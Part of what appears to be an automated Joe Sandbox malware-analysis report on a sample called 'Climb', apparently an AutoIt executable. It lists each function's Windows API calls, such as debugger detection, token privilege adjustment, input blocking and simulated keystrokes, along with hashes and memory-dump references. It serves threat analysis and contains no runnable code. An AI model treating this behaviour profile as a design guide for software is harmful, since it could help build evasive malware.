                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 292994002-0
                                                                                                                                                                          • Opcode ID: eb2bbcc87d1eb25e350dfff3dfad5b99972e80e4373f3d4c92d9b988bb19d705
                                                                                                                                                                          • Instruction ID: bc804842e7204ec04b0075352f7f52b215a629edc50c12d0969b2834160ec800
                                                                                                                                                                          • Opcode Fuzzy Hash: eb2bbcc87d1eb25e350dfff3dfad5b99972e80e4373f3d4c92d9b988bb19d705
                                                                                                                                                                          • Instruction Fuzzy Hash: 0321F4357002198FE711AFAAC844B7A7BE5EF85314F188069F949CB251D771EC42CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 00ADD8CE
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 00ADD92F
                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000), ref: 00ADD943
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 234945975-0
                                                                                                                                                                          • Opcode ID: 317bef30ceb0ab54f6ee62569aef0c5c2286e05dad25262ac4d20a4d5efe300e
                                                                                                                                                                          • Instruction ID: ab523080e198cbbb68290e445fda52fc2d38e58d2a9493c9ce93594746bcd60b
                                                                                                                                                                          • Opcode Fuzzy Hash: 317bef30ceb0ab54f6ee62569aef0c5c2286e05dad25262ac4d20a4d5efe300e
                                                                                                                                                                          • Instruction Fuzzy Hash: F821CFB1500705EFE720DFA5C888BABBBFCEB40314F10441EE24692641E771EE05DB94
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenW.KERNEL32(?,00AA46AC), ref: 00ACE482
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00ACE491
                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00ACE4A2
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00ACE4AE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2695905019-0
                                                                                                                                                                          • Opcode ID: 94b1c27a549b01e4a9dbf1093c9d4d4c1086da28393fae2ac8fbf31b2edfe6f6
                                                                                                                                                                          • Instruction ID: 18af3a7d6a213b13fbbc4a578ceca4a6f36fd400fa41bb9bdab8f829855f12de
                                                                                                                                                                          • Opcode Fuzzy Hash: 94b1c27a549b01e4a9dbf1093c9d4d4c1086da28393fae2ac8fbf31b2edfe6f6
                                                                                                                                                                          • Instruction Fuzzy Hash: 4AF0A030410D10579215E7B8AD0D8BA766EAE02335B504749F836C20E0E779999696D5
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LocalTime
                                                                                                                                                                          • String ID: %.3d$X64
                                                                                                                                                                          • API String ID: 481472006-1077770165
                                                                                                                                                                          • Opcode ID: 71e653d2e3fe4ab377bb49294278c0775b3a7729ab06905fdc54be51ce7dd4f3
                                                                                                                                                                          • Instruction ID: 33399e94ad351f70c414a0363577630f5ced9f1830355bbf781d0a0137f5a474
                                                                                                                                                                          • Opcode Fuzzy Hash: 71e653d2e3fe4ab377bb49294278c0775b3a7729ab06905fdc54be51ce7dd4f3
                                                                                                                                                                          • Instruction Fuzzy Hash: 6DD012B1C04118DADB80D7909D58DF973BCAB18300F10C892F90AD1011E6209904A721
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00A92A8A
                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00A92A94
                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00A92AA1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                          • Opcode ID: d90cab12d77bcec3aa9d3eed82d00f139a9e8997bdd335063e7afa8876278a48
                                                                                                                                                                          • Instruction ID: 1aebff74ecc72d4c748b3ea20d8026741ca0dabbfb185fb2e9a6fcb063e306f2
                                                                                                                                                                          • Opcode Fuzzy Hash: d90cab12d77bcec3aa9d3eed82d00f139a9e8997bdd335063e7afa8876278a48
                                                                                                                                                                          • Instruction Fuzzy Hash: 5B319675901218ABCB61DF64D989799BBB4AF08310F5042DAE41CA7261E7709B85CF45
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A8014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00A809D8
                                                                                                                                                                            • Part of subcall function 00A8014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00A809F5
                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AC205A
                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AC2087
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00AC2097
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 577356006-0
                                                                                                                                                                          • Opcode ID: f0471d2168ce9d6a1f64d4c7f235efb858166b1695bf1a70d74ae5f36e156cb7
                                                                                                                                                                          • Instruction ID: e09ad988b3940c1b9e90228a1e8c225eaad9dbc4de567656651166f49b1a80be
                                                                                                                                                                          • Opcode Fuzzy Hash: f0471d2168ce9d6a1f64d4c7f235efb858166b1695bf1a70d74ae5f36e156cb7
                                                                                                                                                                          • Instruction Fuzzy Hash: A711BFB2400304AFD718AF94DC86E6BB7B9FB04710B21851EE04657251DB70BC42CB24
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,00A8502E,?,00B298D8,0000000C,00A85185,?,00000002,00000000), ref: 00A85079
                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,00A8502E,?,00B298D8,0000000C,00A85185,?,00000002,00000000), ref: 00A85080
                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00A85092
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                          • Opcode ID: 4f3c6c011da7b27ce75abb7605869bb44f259b5e695cea77093d6f98c7f68147
                                                                                                                                                                          • Instruction ID: a4f520df029ec55d7353f7ee66fd72db69b89dd92b63cbc33e6aee37027103c7
                                                                                                                                                                          • Opcode Fuzzy Hash: 4f3c6c011da7b27ce75abb7605869bb44f259b5e695cea77093d6f98c7f68147
                                                                                                                                                                          • Instruction Fuzzy Hash: 0DE0B632800548AFCF22BFA4DE09E683B7AEB51381F514514FD599A521DB35ED52CBC1
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetUserNameW.ADVAPI32(?,?), ref: 00ABE664
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: NameUser
                                                                                                                                                                          • String ID: X64
                                                                                                                                                                          • API String ID: 2645101109-893830106
                                                                                                                                                                          • Opcode ID: c6184ad27bfa9990b595021ca100074d191b784e86e5aee51b195bb43dd50071
                                                                                                                                                                          • Instruction ID: ef8eb7cc3e69d9b69ccd67300b03212ba2520eaaf441f62993cef7eb77ca36b1
                                                                                                                                                                          • Opcode Fuzzy Hash: c6184ad27bfa9990b595021ca100074d191b784e86e5aee51b195bb43dd50071
                                                                                                                                                                          • Instruction Fuzzy Hash: 4FD0C9B480111DEACF80CB90EC88DD9777CBB04304F104692F106E2000DB3095498B10
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00AE52EE,?,?,00000035,?), ref: 00AD4229
                                                                                                                                                                          • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00AE52EE,?,?,00000035,?), ref: 00AD4239
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFormatLastMessage
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3479602957-0
                                                                                                                                                                          • Opcode ID: a7d0cd3191c902e382a0eeb7d60f3c60da6ba1816f68bede70209363fb272b36
                                                                                                                                                                          • Instruction ID: 5c17b258b91cf06d071bc5ac294a6389de81d0ee71d08fcf9c18c9440858b063
                                                                                                                                                                          • Opcode Fuzzy Hash: a7d0cd3191c902e382a0eeb7d60f3c60da6ba1816f68bede70209363fb272b36
                                                                                                                                                                          • Instruction Fuzzy Hash: 9FF0A0306002246AE72057A59C4DFEB367EEF89761F00026AF505D2281DA709A40C6B0
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00ACBC24
                                                                                                                                                                          • keybd_event.USER32(?,76AAC0D0,?,00000000), ref: 00ACBC37
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InputSendkeybd_event
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3536248340-0
                                                                                                                                                                          • Opcode ID: 36f055821292a28e720237ec2ea34587bb714ef5f70f222600a3b29356aade1e
                                                                                                                                                                          • Instruction ID: ad17d6ef4d956cde7119b7f79e6fbd0a275447270278fdac78e084d1e48d7746
                                                                                                                                                                          • Opcode Fuzzy Hash: 36f055821292a28e720237ec2ea34587bb714ef5f70f222600a3b29356aade1e
                                                                                                                                                                          • Instruction Fuzzy Hash: FBF06D7080424DABDB01DFA4C806BFE7BB0FF08309F008409F951AA191C3798201DFA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AC1B48), ref: 00AC1A20
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,00AC1B48), ref: 00AC1A35
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 81990902-0
                                                                                                                                                                          • Opcode ID: 5a05f32be30142963b9bfd704589de8023d44eefe658b5d415e0a3a46d72d24f
                                                                                                                                                                          • Instruction ID: e1480ee307c37c1ec0e9d3d905bd817515db2344da09c1cea4e40a5f58dea35b
                                                                                                                                                                          • Opcode Fuzzy Hash: 5a05f32be30142963b9bfd704589de8023d44eefe658b5d415e0a3a46d72d24f
                                                                                                                                                                          • Instruction Fuzzy Hash: C1E04F72004610AFE7262B50FC09F73B7A9EB04320F14891DF59680470DB62AC91EB10
                                                                                                                                                                          APIs
                                                                                                                                                                          • BlockInput.USER32(00000001), ref: 00ADF51A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: BlockInput
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3456056419-0
                                                                                                                                                                          • Opcode ID: bfc14cf5dabcd0544020752e5869101ce3149515a2116a67f9be8ff489d5146d
                                                                                                                                                                          • Instruction ID: d1357259cf5237ca4aa3ce3e880dfee375502830c94be7b0c5a228e12fd013fd
                                                                                                                                                                          • Opcode Fuzzy Hash: bfc14cf5dabcd0544020752e5869101ce3149515a2116a67f9be8ff489d5146d
                                                                                                                                                                          • Instruction Fuzzy Hash: 4CE048362102045FC710DF69E404957F7E8EFA4761F008426F84BC7351D670F941CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00ACECC7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: mouse_event
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2434400541-0
                                                                                                                                                                          • Opcode ID: 88f2dfa9d049d58267b25daf7b05f38696597733af28422da9d987f0b3648e97
                                                                                                                                                                          • Instruction ID: ab1a136451f338135213b2ddc1cf28ad5dc7562185f26ebc5c4677acf15c5a1e
                                                                                                                                                                          • Opcode Fuzzy Hash: 88f2dfa9d049d58267b25daf7b05f38696597733af28422da9d987f0b3648e97
                                                                                                                                                                          • Instruction Fuzzy Hash: F9D05EB619C20138E81ECB398E2FF762509E701741F8A068DB202C96D8E5E19D00A061
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00A8075E), ref: 00A80D4A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                          • Opcode ID: 82c9d48cf6091ec1f9709a53be0b39ef0fc7bfc11e1213813018c2ed38462320
                                                                                                                                                                          • Instruction ID: 7d389115c6bdfe2114dbb84b23c5e9bb200597b63d2b0c287abdb7629c81d2d8
                                                                                                                                                                          • Opcode Fuzzy Hash: 82c9d48cf6091ec1f9709a53be0b39ef0fc7bfc11e1213813018c2ed38462320
                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                          APIs
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00AE358D
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00AE35A0
                                                                                                                                                                          • DestroyWindow.USER32 ref: 00AE35AF
                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00AE35CA
                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 00AE35D1
                                                                                                                                                                          • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00AE3700
                                                                                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00AE370E
                                                                                                                                                                          • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AE3755
                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00AE3761
                                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00AE379D
                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AE37BF
                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AE37D2
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AE37DD
                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00AE37E6
                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AE37F5
                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00AE37FE
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AE3805
                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00AE3810
                                                                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AE3822
                                                                                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00B00C04,00000000), ref: 00AE3838
                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00AE3848
                                                                                                                                                                          • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00AE386E
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00AE388D
                                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AE38AF
                                                                                                                                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AE3A9C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
